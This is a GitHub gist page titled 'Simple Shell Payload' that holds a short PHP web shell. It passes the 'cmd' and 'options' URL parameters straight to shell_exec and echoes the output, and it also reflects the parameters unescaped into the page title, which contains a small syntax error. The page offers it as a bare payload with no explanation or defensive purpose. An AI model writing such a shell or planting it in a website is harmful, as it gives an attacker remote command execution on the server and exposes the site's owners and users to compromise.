Last active
September 10, 2019 10:43
-
-
Save dino213dz/cb48e252ea0b729c3b121823defcf555 to your computer and use it in GitHub Desktop.
Simple Shell Payload
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html><head><title><?php echo $_GET['cmd'].' '$_GET['options'] ?></title></head><body> | |
<?php echo shell_exec($_GET['cmd'].' '.$_GET['options']); ?> | |
</body></html> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment